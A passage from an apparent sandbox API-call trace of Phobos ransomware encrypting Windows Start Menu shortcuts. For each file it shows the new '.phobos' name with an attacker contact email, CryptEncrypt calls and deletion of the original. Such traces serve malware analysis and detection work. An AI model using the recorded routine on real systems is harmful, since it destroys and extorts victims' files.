pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.218] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0202.218] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.218] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0202.218] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.218] CloseHandle (hObject=0x178) returned 1 [0202.218] CloseHandle (hObject=0x124) returned 1 [0202.218] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk")) returned 1 [0202.219] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.220] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262) returned 1 [0202.220] CloseHandle (hObject=0x124) returned 1 [0202.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk")) returned 0x20 [0202.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.221] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.221] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.222] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.222] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x106, lpOverlapped=0x0) returned 1 [0202.223] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0202.223] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0202.223] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0202.223] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.223] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.223] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.223] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.224] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.224] CloseHandle (hObject=0x124) returned 1 [0202.224] CloseHandle (hObject=0x178) returned 1 [0202.224] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk")) returned 1 [0202.225] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.226] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1503) returned 1 [0202.226] CloseHandle (hObject=0x178) returned 1 [0202.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk")) returned 0x20 [0202.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.228] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.228] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.230] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.230] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5df, lpOverlapped=0x0) returned 1 [0202.292] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5e0, dwBufLen=0x5e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5e0) returned 1 [0202.292] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5e0, lpOverlapped=0x0) returned 1 [0202.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0202.293] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.293] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0202.293] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.293] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0202.293] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.293] CloseHandle (hObject=0x178) returned 1 [0202.293] CloseHandle (hObject=0x124) returned 1 [0202.293] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk")) returned 1 [0202.295] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.296] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1228) returned 1 [0202.297] CloseHandle (hObject=0x124) returned 1 [0202.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk")) returned 0x20 [0202.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.297] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.297] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.299] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.299] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4cc, lpOverlapped=0x0) returned 1 [0202.300] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4d0) returned 1 [0202.300] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4d0, lpOverlapped=0x0) returned 1 [0202.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0202.301] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.301] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.301] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.301] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.301] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.301] CloseHandle (hObject=0x124) returned 1 [0202.301] CloseHandle (hObject=0x178) returned 1 [0202.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk")) returned 1 [0202.303] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.303] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1419) returned 1 [0202.304] CloseHandle (hObject=0x178) returned 1 [0202.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk")) returned 0x20 [0202.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.304] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.304] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.307] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.307] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.307] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x58b, lpOverlapped=0x0) returned 1 [0202.316] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x590, dwBufLen=0x590 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x590) returned 1 [0202.316] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x590, lpOverlapped=0x0) returned 1 [0202.317] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0202.317] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.317] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0202.317] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.317] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0202.318] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.318] CloseHandle (hObject=0x178) returned 1 [0202.318] CloseHandle (hObject=0x124) returned 1 [0202.320] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk")) returned 1 [0202.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.324] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1453) returned 1 [0202.324] CloseHandle (hObject=0x124) returned 1 [0202.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk")) returned 0x20 [0202.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.325] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.325] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.326] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, 